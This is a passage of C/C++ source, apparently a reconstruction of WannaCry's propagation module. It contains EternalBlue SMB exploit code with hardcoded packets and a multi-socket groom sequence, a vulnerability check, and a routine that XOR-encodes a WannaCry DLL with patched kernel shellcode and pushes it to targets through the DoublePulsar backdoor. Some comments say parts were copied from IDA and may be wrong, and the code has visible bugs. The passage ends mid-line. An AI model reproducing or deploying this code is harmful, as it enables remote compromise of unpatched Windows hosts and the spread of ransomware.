InjectWannaCryDLLViaDoublePulsarBackdoor(SOCKET s, int architectureType, int xkey) 141 | { 142 | /* 143 | DWORD WannacryFileSize = value of -> ReadFile Wannacry EXE into -> EXE_BUFFER_SOMEWHERE 144 | DWORD totalPayloadSize_x86 = 0x4060 + 0x1305 + WannacryFileSize; 145 | DWORD totalPayloadSize_x64 = 0xc8a4 + 0x1800 + WannacryFileSize; 146 | */ 147 | 148 | /* 149 | /* 150 | 32-bit dll start address 0x40B020, size is 0x4060 bytes 151 | 64-bit dll start address 0x40F080, size is 0xc8a4 bytes 152 | 32-bit shellcode start address 0x42E758, size is 0x1305 bytes 153 | 64-bit shellcode start address 0x42FA60, size 0x1800 bytes 154 | */ 155 | const void *rundll_shellcode; 156 | char *DLLPayload; 157 | int shellcode_payload_size; 158 | int DLLSize; 159 | int total_size; 160 | if(architectureType) 161 | { 162 | //32 bits 163 | Payload = &hDLL_x86; 164 | shellcode_payload_size = 0x1305; //decimal: 4869 165 | PayloadSize = 0x50D800; 166 | } 167 | else 168 | { 169 | //64 bits 170 | Payload = &hDLL_x64; 171 | shellcode_payload_size = 0x1800; //decimal: 6144 172 | PayloadSize = 0x50D800; 173 | } 174 | 175 | HGLOBAL hMem = GlobalAlloc(GMEM_ZEROINIT, shellcode_payload_size + PayloadSize + 12); 176 | 177 | //could be wrong but copied from IDA 178 | //looks like the DLL is added to the hMem location right after the runDLL shellcode 179 | memcpy(hMem + shellcode_payload_size, Payload, PayloadSize); 180 | 181 | //not sure what is going on here, but looks like the total_size is getting populated here 182 | /* Kept for historical purposes but most likely WRONG 183 | if (&DLLPayload[shellcode_payload_size] % 4) 184 | { 185 | total_size = 4 * ((signed int)DLLPayload[shellcode_payload_size] / 4) + 4; 186 | } 187 | else 188 | { 189 | total_size = DLLPayload[shellcode_payload_size]; 190 | }*/ 191 | if ( PayloadSize + shellcode_payload_size % 4) { 192 | total_size = 4 * ((5298176 + 6144) / 4) + 4; 193 | } 194 | else { 195 | total_size = 0x50D800 + 0x1800; 196 | } 197 | 198 | if(architectureType) 199 | { 200 | /* source: https://cloud.tencent.com/developer/article/1910271 */ 201 | 202 | //32 bits 203 | rundll_shellcode = &x86_kernel_shellcode; 204 | 205 | /* 0x42ECE9 - 0x42E758 = 0x591 */ 206 | //update payload + shellcode size in the x86 kernel shellcode 207 | *(DWORD*)&x86_kernel_shellcode[1425] = 0x50D800+3440; 208 | 209 | //update DLL size 210 | *(DWORD*)&x86_kernel_shellcode[0x12FD] = 0x50D800; 211 | 212 | //update ordinal 213 | *(DWORD*)&x86_kernel_shellcode[0x1301] = 1; 214 | } 215 | else 216 | { 217 | /* source: https://cloud.tencent.com/developer/article/1910271 */ 218 | 219 | //64 bits 220 | rundll_shellcode = &x64_kernel_shellcode; 221 | 222 | //shellcode must be patched in 3 areas 223 | /* 1.) Kernel shellcode must be updated to include the DLL size + Userland shellcode size 224 | for proper allocation in memory 225 | */ 226 | DWORD DLL_and_UserlandShellcodeSize = 0x50D800 + 3978; 227 | *(DWORD*)&x64_kernel_shellcode[0x86E] = DLL_and_UserlandShellcodeSize; 228 | //0x4302CE - 0x42FA60 = 0x86E 229 | //x64_kernel_shellcode[2158] = 6144+3978; 230 | 231 | /* Userland shellcode DLL size len */ 232 | /* this value was obtained from subtracting the Userland shellcode size from the Total size of the entire shellcode 233 | so...if entire shellcode size is 6144 or 0x1800 234 | and if userland shellcode is 3978, then kernel shellcode size is 2166 235 | */ 236 | *(DWORD*)&x64_kernel_shellcode[2166+0xf82] = 0x50D800; 237 | //6136 238 | 239 | /* Userland shellcode DLL ordinal to call */ 240 | *(DWORD*)&x64_kernel_shellcode[2166+0xf86] = 1; //default already set to 1 241 | //6140 242 | } 243 | memcpy(hMem, rundll_shellcode, shellcode_payload_size); 244 | xor_payload(xkey, hMem, total_size); 245 | memcpy(send_buffer, wannacry_trans2_exec_packet, 70); 246 | 247 | v9 = total_size / 4096; 248 | v10 = total_size % 4096; 249 | 250 | /* may be needed for signature 251 | #define __PAIR__(high, low) (((unsigned long)(high)< 0) 275 | { 276 | for(i=0; ; ctx=i) 277 | { 278 | o_offset = ctx ^ xkey; 279 | memcpy(Parametersbuffer, (char*)&xor_payload_size, 4); 280 | memcpy(Parametersbuffer + 4, (char*)&chunk_size, 4); 281 | memcpy(Parametersbuffer + 8, (char*)&o_offset, 4); 282 | 283 | //size 70 284 | memcpy(send_buffer, wannacry_Trans2_Request, sizeof(wannacry_Trans2_Request)); 285 | //copy parameters 286 | memcpy(send_buffer + 70 , Parametersbuffer, 12); 287 | //copy 4096 bytes of payload 288 | memcpy(send_buffer + 82, (char *)hMem + ctx, 4096); 289 | send(socket, (char*)send_buffer, 4178, 0); 290 | recv(socket, (char*)recv_buffer, 4096, 0); 291 | if(recvbuff[34] != 82) 292 | { 293 | //error, doublePulsar should return 82 294 | break; 295 | } 296 | ctx += 4096; //increment counter 297 | bytesleft -= 4096; //tracker to see how many bytes we have left 298 | } 299 | } 300 | 301 | if ( v10 > 0 ) 302 | { 303 | //update chunk size to what's left in the encrypted payload buffer 304 | chunk_size = bytesLeft ^ xkey; 305 | //update offset by XORing the latest value 306 | o_offset = ctx ^ xkey; 307 | memcpy(Parametersbuffer, (char*)&xor_payload_size, 4); 308 | memcpy(Parametersbuffer + 4, (char*)&chunk_size, 4); 309 | memcpy(Parametersbuffer + 8, (char*)&o_offset, 4); 310 | //parameters are copied accurately to the buffer 311 | 312 | //size 70 313 | memcpy(send_buffer, wannacry_Trans2_Request, sizeof(wannacry_Trans2_Request)); 314 | //update last packet SMB Length 315 | unsigned short smblen; 316 | smblen = bytesLeft+70+12; //BytesLeft + DoublePulsar Exec Packet Length + Trans2 SESSION_SETUP parameters - 4 since netBIOS isn't counted 317 | unsigned short smb_length_value = htons(smblen); 318 | //memcpy(buffer+2, &smblen, 2); 319 | memcpy(buffer+2, &smb_length_value, 2); 320 | 321 | //copy parameters 322 | memcpy(send_buffer + 70 , Parametersbuffer, 12); 323 | //copy last payload size = bytesLeft 324 | memcpy(send_buffer + 82, (char *)hMem + ctx, bytesLeft); 325 | send(socket, (char*)send_buffer, bytesLeft+82, 0); 326 | recv(socket, (char*)recv_buffer, 4096, 0); 327 | } 328 | //This part of the code is for debug purposes 329 | if(recvbuff[34] == 82) 330 | { 331 | //DEBUG PURPOSE ONLY 332 | printf("Doublepulsar ran successfully!\n"); 333 | } 334 | ///////////////////////////////////////////// 335 | GlobalFree(hMem); 336 | } 337 | 338 | int runPayloadOnTarget(char *host, u_short hostshort) 339 | { 340 | unsigned int sig; 341 | unsigned int XorKey; 342 | SOCKET dsock; 343 | struct sockaddr name; 344 | char userid[2]; 345 | char treeid[2]; 346 | char recvbuff[1024]; 347 | 348 | name.sin_family = AF_INET; 349 | name.sin_addr.s_addr = inet_addr(host); 350 | name.sin_port = htons(hostshort); 351 | dsock = socket(AF_INET, SOCK_STREAM, 0); 352 | connect(dsock, (struct sockaddr*) &name, sizeof(name)); 353 | 354 | //send SMB negociate packet 355 | send(dsock, (char*)SmbNegociate, sizeof(SmbNegociate) - 1, 0); 356 | recv(dsock, (char*)recvbuff, sizeof(recvbuff), 0); 357 | 358 | //send Session Setup AndX request 359 | send(dsock, (char*)Session_Setup_AndX_Request, sizeof(Session_Setup_AndX_Request) - 1, 0); 360 | recv(dsock, (char*)recvbuff, sizeof(recvbuff), 0); 361 | 362 | //copy userID from recvbuff @ 32,33 363 | userid[0] = recvbuff[32]; 364 | userid[1] = recvbuff[33]; 365 | 366 | //update userID in the tree connect request 367 | treeConnectRequest[32] = userid[0]; 368 | treeConnectRequest[33] = userid[1]; 369 | send(dsock, (char*)treeConnectRequest, sizeof(treeConnectRequest) - 1, 0); 370 | recv(dsock, (char*)recvbuff, sizeof(recvbuff), 0); 371 | 372 | //copy treeID from recvbuff @ 28, 29 373 | treeid[0] = recvbuff[28]; 374 | treeid[1] = recvbuff[29]; 375 | 376 | trans2_session_setup[28] = treeid[0]; 377 | trans2_session_setup[29] = treeid[1] 378 | trans2_session_setup[32] = userid[0]; 379 | trans2_session_setup[33] = userid[1]; 380 | 381 | send(dsock, (char*)trans2_session_setup, sizeof(trans2_session_setup) - 1, 0); 382 | recv(dsock, (char*)recvbuff, sizeof(recvbuff), 0); 383 | 384 | unsigned char signature[4]; 385 | if (recvbuff[34] == 0x51) 386 | { 387 | ArchitectureType = int(recvbuff[22]); 388 | 389 | signature[0] = recvbuff[18]; 390 | signature[1] = recvbuff[19]; 391 | signature[2] = recvbuff[20]; 392 | signature[3] = recvbuff[21]; 393 | signature[4] = '\0'; 394 | sig = LE2INT(signature); 395 | XorKey = ComputeDOUBLEPULSARXorKey(sig); 396 | InjectWannaCryDLLViaDoublePulsarBackdoor(dsock, ArchitectureType, XorKey); 397 | } 398 | closesocket(dsock); 399 | return 0; 400 | } 401 | -------------------------------------------------------------------------------- /Eternalblue.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #pragma comment(lib, "wsock32.lib") 6 | #include "Eternalblue.h" 7 | 8 | unsigned char SmbNegociate[] = 9 | "\x00\x00\x00\x85\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00\x00" 10 | "\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" 11 | "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30" 12 | "\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"; 13 | 14 | unsigned char Session_Setup_AndX_Request[] = 15 | "\x00\x00\x00\x88\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc0\x00\x00" 16 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00" 17 | "\x0d\xff\x00\x88\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00" 18 | "\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x4b\x00\x00\x00\x00\x00\x00\x57\x00" 19 | "\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00" 20 | "\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00" 21 | "\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00" 22 | "\x30\x00\x30\x00\x20\x00\x35\x00\x2e\x00\x30\x00\x00\x00"; 23 | 24 | unsigned char treeConnectRequest[] = 25 | "\x00\x00\x00\x60\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc0" 26 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe" 27 | "\x00\x08\x40\x00\x04\xff\x00\x60\x00\x08\x00\x01\x00\x35\x00\x00" 28 | "\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31\x00\x36\x00" 29 | "\x38\x00\x2e\x00\x31\x00\x37\x00\x35\x00\x2e\x00\x31\x00\x32\x00" 30 | "\x38\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f\x3f\x00"; 31 | 32 | unsigned char transNamedPipeRequest[] = 33 | "\x00\x00\x00\x4a\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x01\x28\x00" 34 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x8e\xa3\x01\x08" 35 | "\x52\x98\x10\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00" 36 | "\x00\x00\x00\x00\x00\x00\x4a\x00\x00\x00\x4a\x00\x02\x00\x23\x00\x00" 37 | "\x00\x07\x00\x5c\x50\x49\x50\x45\x5c\x00"; 38 | 39 | void replacePlaceholderWithBytes(unsigned char* buffer, size_t bufferSize, const char* placeholder, unsigned char *newValue) { 40 | size_t placeholderLength = strlen(placeholder); 41 | size_t offset = 0; 42 | 43 | // Iterate through the buffer to find and replace the placeholder 44 | while (offset < bufferSize) { 45 | // Find the position of the placeholder in the remaining buffer 46 | void* position = memchr(buffer + offset, placeholder[0], bufferSize - offset); 47 | 48 | // If the placeholder is found, replace it with the new value 49 | if (position != NULL) { 50 | // Calculate the position relative to the entire buffer 51 | size_t absolutePosition = (unsigned char*)position - buffer; 52 | 53 | // Check if the remaining buffer is long enough to contain the placeholder 54 | if (absolutePosition + placeholderLength <= bufferSize) { 55 | // Allocate memory for the new string 56 | char* newString = (char*)malloc(bufferSize - placeholderLength + sizeof(unsigned char)*2 ); 57 | 58 | // Copy the content before the placeholder 59 | memcpy(newString, buffer, absolutePosition); 60 | 61 | // Copy the two bytes of the new value as characters 62 | memcpy(newString + absolutePosition, (unsigned char*)newValue, sizeof(unsigned char)*2); 63 | 64 | // Copy the content after the placeholder 65 | memcpy(newString + absolutePosition + sizeof(unsigned char)*2, buffer + absolutePosition + placeholderLength, 66 | bufferSize - absolutePosition - placeholderLength); 67 | 68 | // Update the original buffer with the new string 69 | memcpy(buffer, newString, bufferSize - placeholderLength + sizeof(WORD)); 70 | 71 | // Free the allocated memory 72 | free(newString); 73 | 74 | // Move the offset to the end of the replaced portion 75 | offset = absolutePosition + sizeof(unsigned char)*2; 76 | } 77 | else { 78 | // If the remaining buffer is not long enough, exit the loop 79 | break; 80 | } 81 | } 82 | else { 83 | // If the placeholder is not found, exit the loop 84 | break; 85 | } 86 | } 87 | } 88 | 89 | //Usage: replace_SMB_values(SMB_Trans2_Packet, "__TREEID__PLACEHOLDER__", treeid); 90 | //replace_SMB_values(SMB_Trans2_Packet, "__USERID__PLACEHOLDER__", userid); 91 | int replace_SMB_values(unsigned char *smb_packet, const char placeholder, unsigned char *replacevalue) 92 | { 93 | // Example SMB string to replace 94 | /* 95 | unsigned char smb_packet[] = "\x00\x00\x10\x4e\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x18\x07\xc0" 96 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5F\x5F\x54\x52\x45\x45\x49\x44\x5F\x50\x4C\x41\x43\x45\x48\x4F\x4C\x44\x45\x52\x5F\x5F\xff\xfe" 97 | "\x00\x08\x42\x00\x0f\x0c\x00\x00\x10\x01\x00\x00\x00\x00\x00\x00" 98 | "\x00\x25\x89\x1a\x00\x00\x00\x0c\x00\x42\x00\x00\x10\x4e\x00\x01" 99 | "\x00\x0e\x00\x0d\x10\x00"; */ 100 | size_t bufferSize = sizeof(smb_packet) - 1; // Exclude the null terminator 101 | 102 | /* 103 | __USERID__PLACEHOLDER__ 104 | __TREEID__PLACEHOLDER__ 105 | __TREEPATH_REPLACE__ 106 | */ 107 | //const char placeholder[] = "__TREEID_PLACEHOLDER__"; 108 | //unsigned char treeid[] = "\xA6\xFF"; 109 | 110 | //unsigned char treeid[2]; 111 | //treeid[0] = 0xA6; 112 | //treeid[1] = 0xF8; 113 | 114 | // Call the function to replace the placeholder with the new value 115 | replacePlaceholderWithBytes(smb_packet, bufferSize, placeholder, replacevalue); 116 | return 0; 117 | } 118 | 119 | int CheckForEternalBlue(char *host, int port) 120 | { 121 | struct sockaddr_in server; 122 | SOCKET sock; 123 | DWORD ret; 124 | unsigned char recvbuff[2048]; 125 | sock = socket(AF_INET, SOCK_STREAM, 0); 126 | if (sock <= 0) 127 | { 128 | return 1; 129 | } 130 | server.sin_family = AF_INET; 131 | server.sin_addr.s_addr = inet_addr(host); 132 | server.sin_port = htons(port); 133 | ret = connect(sock, (struct sockaddr*)&server, sizeof(server)); 134 | 135 | //send SMB negociate packet 136 | send(sock, (char*)SmbNegociate, sizeof(SmbNegociate) - 1, 0); 137 | recv(sock, (char*)recvbuff, sizeof(recvbuff), 0); 138 | 139 | //send Session Setup AndX request 140 | ret = send(sock, (char*)Session_Setup_AndX_Request, sizeof(Session_Setup_AndX_Request) - 1, 0); 141 | if (ret <= 0) 142 | { 143 | return 1; 144 | } 145 | recv(sock, (char*)recvbuff, sizeof(recvbuff), 0); 146 | 147 | char userid[2]; 148 | char treeid[2]; 149 | //copy userID from recvbuff @ 32,33 150 | userid[0] = recvbuff[32]; 151 | userid[1] = recvbuff[33]; 152 | 153 | //update userID in the tree connect request 154 | treeConnectRequest[32] = userid[0]; 155 | treeConnectRequest[33] = userid[1]; 156 | 157 | //send TreeConnect request 158 | ret = send(sock, (char*)treeConnectRequest, sizeof(treeConnectRequest) - 1, 0); 159 | if (ret <= 0) 160 | { 161 | return 1; 162 | } 163 | recv(sock, (char*)recvbuff, sizeof(recvbuff), 0); 164 | 165 | //copy treeID from recvbuff @ 28, 29 166 | treeid[0] = recvbuff[28]; 167 | treeid[1] = recvbuff[29]; 168 | //update treeid & userid in the transNamedPipe Request 169 | transNamedPipeRequest[28] = treeid[0]; 170 | transNamedPipeRequest[29] = treeid[1]; 171 | transNamedPipeRequest[32] = userid[0]; 172 | transNamedPipeRequest[33] = userid[1]; 173 | 174 | //send transNamedPipe request 175 | ret = send(sock, (char*)transNamedPipeRequest, sizeof(transNamedPipeRequest) - 1, 0); 176 | if (ret <= 0) 177 | { 178 | return 1; 179 | } 180 | recv(sock, (char*)recvbuff, sizeof(recvbuff), 0); 181 | 182 | //compare the NT_STATUS response to 0xC0000205 ( STATUS_INSUFF_SERVER_RESOURCES) 183 | if (recvbuff[9] == 0x05 && recvbuff[10] == 0x02 && recvbuff[11] == 0x00 && recvbuff[12] == 0xc0) 184 | { 185 | closesocket(sock); 186 | return 1; 187 | } 188 | else 189 | { 190 | closesocket(sock); 191 | //not vulnerable 192 | return 1; 193 | } 194 | } 195 | 196 | int EternalBluePwn(char *host, int port) 197 | { 198 | struct sockaddr_in server; 199 | SOCKET s1, s2, s3, s4, s5, s6, s7, s8, s9, s10, s11, s12, s13, s14, s15, s16, s17, s18, s19, s20, s21; 200 | 201 | char userid[2]; 202 | char treeid[2]; 203 | 204 | s1 = socket(AF_INET, SOCK_STREAM, 0); 205 | s2 = socket(AF_INET, SOCK_STREAM, 0); 206 | s3 = socket(AF_INET, SOCK_STREAM, 0); 207 | s4 = socket(AF_INET, SOCK_STREAM, 0); 208 | 209 | s5 = socket(AF_INET, SOCK_STREAM, 0); 210 | s6 = socket(AF_INET, SOCK_STREAM, 0); 211 | s7 = socket(AF_INET, SOCK_STREAM, 0); 212 | s8 = socket(AF_INET, SOCK_STREAM, 0); 213 | s9 = socket(AF_INET, SOCK_STREAM, 0); 214 | s10 = socket(AF_INET, SOCK_STREAM, 0); 215 | s11 = socket(AF_INET, SOCK_STREAM, 0); 216 | s12 = socket(AF_INET, SOCK_STREAM, 0); 217 | 218 | s13 = socket(AF_INET, SOCK_STREAM, 0); 219 | s14 = socket(AF_INET, SOCK_STREAM, 0); 220 | s15 = socket(AF_INET, SOCK_STREAM, 0); 221 | s16 = socket(AF_INET, SOCK_STREAM, 0); 222 | 223 | s17 = socket(AF_INET, SOCK_STREAM, 0); 224 | s18 = socket(AF_INET, SOCK_STREAM, 0); 225 | s19 = socket(AF_INET, SOCK_STREAM, 0); 226 | s20 = socket(AF_INET, SOCK_STREAM, 0); 227 | s21 = socket(AF_INET, SOCK_STREAM, 0); 228 | 229 | server.sin_family = AF_INET; 230 | server.sin_addr.s_addr = inet_addr(host); 231 | server.sin_port = htons(port); 232 | 233 | connect(s1, (struct sockaddr*) & server, sizeof(server)); 234 | 235 | //send negociation 236 | send(s1, (char*)smbnegociate, sizeof(smbnegociate) - 1, 0); 237 | recv(s1, (char*)recvbuff, sizeof(recvbuff), 0); 238 | 239 | send(s1, (char*)session_setup, sizeof(session_setup) - 1, 0); 240 | recv(s1, (char*)recvbuff, sizeof(recvbuff), 0); 241 | userid[0] = recvbuff[32]; 242 | userid[1] = recvbuff[33]; 243 | 244 | //update userID in the tree connect request 245 | treeconnect[32] = userid[0]; 246 | treeconnect[33] = userid[1]; 247 | 248 | send(s1, (char*)treeconnect, sizeof(treeconnect) - 1, 0); 249 | recv(s1, (char*)recvbuff, sizeof(recvbuff), 0); 250 | //copy treeID from recvbuff @ 28, 29 251 | treeid[0] = recvbuff[28]; 252 | treeid[1] = recvbuff[29]; 253 | 254 | send(s1, (char*)NTTrans, sizeof(NTTrans) - 1, 0); 255 | recv(s1, (char*)recvbuff, sizeof(recvbuff), 0); 256 | 257 | send(s1, (char*)NTTrans2, sizeof(NTTrans2) - 1, 0); 258 | 259 | send(s1, (char*)NTTrans3, sizeof(NTTrans3) - 1, 0); 260 | 261 | send(s1, (char*)NTTrans4, sizeof(NTTrans4) - 1, 0); 262 | 263 | send(s1, (char*)NTTrans5, sizeof(NTTrans5) - 1, 0); 264 | 265 | send(s1, (char*)NTTrans6, sizeof(NTTrans6) - 1, 0); 266 | 267 | send(s1, (char*)NTTrans7, sizeof(NTTrans7) - 1, 0); 268 | 269 | send(s1, (char*)NTTrans8, sizeof(NTTrans8) - 1, 0); 270 | 271 | send(s1, (char*)NTTrans9, sizeof(NTTrans9) - 1, 0); 272 | 273 | send(s1, (char*)NTTrans10, sizeof(NTTrans10) - 1, 0); 274 | 275 | send(s1, (char*)NTTrans11, sizeof(NTTrans11) - 1, 0); 276 | 277 | send(s1, (char*)NTTrans12, sizeof(NTTrans12) - 1, 0); 278 | 279 | send(s1, (char*)NTTrans13, sizeof(NTTrans13) - 1, 0); 280 | 281 | send(s1, (char*)NTTrans14, sizeof(NTTrans14) - 1, 0); 282 | 283 | send(s1, (char*)NTTrans15, sizeof(NTTrans15) - 1, 0); 284 | 285 | send(s1, (char*)NTTrans16, sizeof(NTTrans16) - 1, 0); 286 | 287 | send(s1, (char*)NTTrans17, sizeof(NTTrans17) - 1, 0); 288 | 289 | send(s1, (char*)NTTrans18, sizeof(NTTrans18) - 1, 0); 290 | 291 | send(s1, (char*)NTTrans19, sizeof(NTTrans19) - 1, 0); 292 | 293 | send(s1, (char*)NTTrans20, sizeof(NTTrans20) - 1, 0); 294 | 295 | send(s1, (char*)NTTrans21, sizeof(NTTrans21) - 1, 0); 296 | 297 | send(s1, (char*)NTTrans22, sizeof(NTTrans22) - 1, 0); 298 | 299 | send(s1, (char*)NTTrans23, sizeof(NTTrans23) - 1, 0); 300 | 301 | send(s1, (char*)NTTrans24, sizeof(NTTrans24) - 1, 0); 302 | 303 | send(s1, (char*)NTTrans25, sizeof(NTTrans25) - 1, 0); 304 | 305 | send(s1, (char*)NTTrans26, sizeof(NTTrans26) - 1, 0); 306 | 307 | send(s1, (char*)NTTrans27, sizeof(NTTrans27) - 1, 0); 308 | send(s1, (char*)NTTrans28, sizeof(NTTrans28) - 1, 0); 309 | 310 | send(s1, (char*)NTTrans29, sizeof(NTTrans29) - 1, 0); 311 | 312 | send(s1, (char*)NTTrans30, sizeof(NTTrans30) - 1, 0); 313 | 314 | send(s1, (char*)NTTrans31, sizeof(NTTrans31) - 1, 0); 315 | 316 | send(s1, (char*)NTTrans32, sizeof(NTTrans32) - 1, 0); 317 | 318 | send(s1, (char*)NTTrans33, sizeof(NTTrans33) - 1, 0); 319 | 320 | send(s1, (char*)NTTrans34, sizeof(NTTrans34) - 1, 0); 321 | 322 | send(s1, (char*)NTTrans35, sizeof(NTTrans35) - 1, 0); 323 | 324 | send(s1, (char*)NTTrans36, sizeof(NTTrans36) - 1, 0); 325 | 326 | send(s1, (char*)NTTrans37, sizeof(NTTrans37) - 1, 0); 327 | 328 | send(s1, (char*)NTTrans38, sizeof(NTTrans38) - 1, 0); 329 | send(s1, (char*)NTTrans39, sizeof(NTTrans39) - 1, 0); 330 | 331 | send(s1, (char*)NTTrans40, sizeof(NTTrans40) - 1, 0); 332 | 333 | send(s1, (char*)NTTrans41, sizeof(NTTrans41) - 1, 0); 334 | 335 | send(s1, (char*)NTTrans42, sizeof(NTTrans42) - 1, 0); 336 | 337 | send(s1, (char*)NTTrans43, sizeof(NTTrans43) - 1, 0); 338 | 339 | send(s1, (char*)NTTrans44, sizeof(NTTrans44) - 1, 0); 340 | 341 | send(s1, (char*)NTTrans45, sizeof(NTTrans45) - 1, 0); 342 | 343 | send(s1, (char*)NTTrans46, sizeof(NTTrans46) - 1, 0); 344 | 345 | send(s1, (char*)SmbEcho, sizeof(SmbEcho) - 1, 0); 346 | recv(s1, (char*)recvbuff, sizeof(recvbuff), 0); 347 | 348 | //connect to second socket 349 | connect(s2, (struct sockaddr*) & server, sizeof(server)); 350 | send(s2, (char*)negociate2, sizeof(negociate2) - 1, 0); 351 | recv(s2, (char*)recvbuff, sizeof(recvbuff), 0); 352 | 353 | send(s2, (char*)unknown_packet_socket2, sizeof(unknown_packet_socket2) - 1, 0); 354 | recv(s2, (char*)recvbuff, sizeof(recvbuff), 0); 355 | 356 | connect(s3, (struct sockaddr*) & server, sizeof(server)); 357 | connect(s4, (struct sockaddr*) & server, sizeof(server)); 358 | 359 | send(s3, (char*)unknown_packet_socket3, sizeof(unknown_packet_socket3) - 1, 0); 360 | 361 | connect(s5, (struct sockaddr*) & server, sizeof(server)); 362 | 363 | send(s4, (char*)unknown_packet_socket4, sizeof(unknown_packet_socket4) - 1, 0); 364 | 365 | send(s5, (char*)unknown_packet_socket5, sizeof(unknown_packet_socket5) - 1, 0); 366 | 367 | connect(s6, (struct sockaddr*) & server, sizeof(server)); 368 | send(s6, (char*)unknown_packet_socket5, sizeof(unknown_packet_socket5) - 1, 0); 369 | 370 | connect(s7, (struct sockaddr*) & server, sizeof(server)); 371 | connect(s8, (struct sockaddr*) & server, sizeof(server)); 372 | send(s7, (char*)unknown_packet_socket7, sizeof(unknown_packet_socket7) - 1, 0); 373 | 374 | send(s8, (char*)unknown_packet_socket8, sizeof(unknown_packet_socket8) - 1, 0); 375 | 376 | connect(s9, (struct sockaddr*) & server, sizeof(server)); 377 | connect(s10, (struct sockaddr*) & server, sizeof(server)); 378 | 379 | send(s9, (char*)unknown_packet_socket9, sizeof(unknown_packet_socket9) - 1, 0); 380 | send(s10, (char*)unknown_packet_socket10, sizeof(unknown_packet_socket10) - 1, 0); 381 | 382 | connect(s11, (struct sockaddr*) & server, sizeof(server)); 383 | connect(s12, (struct sockaddr*) & server, sizeof(server)); 384 | send(s11, (char*)unknown_packet_socket11, sizeof(unknown_packet_socket11) - 1, 0); 385 | 386 | connect(s13, (struct sockaddr*) & server, sizeof(server)); 387 | 388 | send(s12, (char*)unknown_packet_socket12, sizeof(unknown_packet_socket12) - 1, 0); 389 | 390 | connect(s14, (struct sockaddr*) & server, sizeof(server)); 391 | 392 | send(s13, (char*)unknown_packet_socket13, sizeof(unknown_packet_socket13) - 1, 0); 393 | 394 | connect(s15, (struct sockaddr*) & server, sizeof(server)); 395 | 396 | send(s14, (char*)unknown_packet_socket14, sizeof(unknown_packet_socket14) - 1, 0); 397 | 398 | connect(s16, (struct sockaddr*) & server, sizeof(server)); 399 | 400 | send(s15, (char*)unknown_packet_socket15, sizeof(unknown_packet_socket15) - 1, 0); 401 | 402 | send(s16, (char*)negociate_socket16, sizeof(negociate_socket16) - 1, 0); 403 | recv(s16, (char*)recvbuff, sizeof(recvbuff), 0); 404 | 405 | send(s16, (char*)unknown_packet_socket16, sizeof(unknown_packet_socket16) - 1, 0); 406 | //get information 407 | recv(s16, (char*)recvbuff, sizeof(recvbuff), 0); 408 | 409 | closesocket(s2); 410 | 411 | connect(s17, (struct sockaddr*) & server, sizeof(server)); 412 | send(s17, (char*)unknown_packet_socket17, sizeof(unknown_packet_socket17) - 1, 0); 413 | 414 | connect(s18, (struct sockaddr*) & server, sizeof(server)); 415 | connect(s19, (struct sockaddr*) & server, sizeof(server)); 416 | 417 | send(s18, (char*)unknown_packet_socket18, sizeof(unknown_packet_socket18) - 1, 0); 418 | 419 | connect(s20, (struct sockaddr*) & server, sizeof(server)); 420 | send(s19, (char*)unknown_packet_socket19, sizeof(unknown_packet_socket19) - 1, 0); 421 | 422 | connect(s21, (struct sockaddr*) & server, sizeof(server)); 423 | send(s20, (char*)unknown_packet_socket20, sizeof(unknown_packet_socket20) - 1, 0); 424 | send(s21, (char*)unknown_packet_socket21, sizeof(unknown_packet_socket21) - 1, 0); 425 | 426 | closesocket(s16); 427 | 428 | send(s1, (char*)smbecho_socket1, sizeof(smbecho_socket1) - 1, 0); 429 | recv(s1, (char*)recvbuff, sizeof(recvbuff), 0); 430 | 431 | send(s1, (char*)last_eternalblue_packet, sizeof(last_eternalblue_packet) - 1, 0); 432 | send(s1, (char*)last_eternalblue_packet2, sizeof(last_eternalblue_packet2) - 1, 0); 433 | send(s1, (char*)last_eternalblue_packet3, sizeof(last_eternalblue_packet3) - 1, 0); 434 | recv(s1, (char*)recvbuff, sizeof(recvbuff), 0); 435 | 436 | //check for EternalBlue overwrite in response packet 437 | if (recvbuff[9] == 0x0d && recvbuff[10] == 0x00 && recvbuff[11] == 0x00 && recvbuff[12] == 0xc0) 438 | { 439 | //printf("Got STATUS_INVALID_PARAMETER! EternalBlue overwrite successful!\n"); 440 | //looking good so far if we reached this point 441 | } 442 | 443 | //send doublepulsar packets 444 | send(s3, (char*)doublepulsar_packet_socket3, sizeof(doublepulsar_packet_socket3) - 1, 0); 445 | send(s3, (char*)doublepulsar_packet2_socket3, 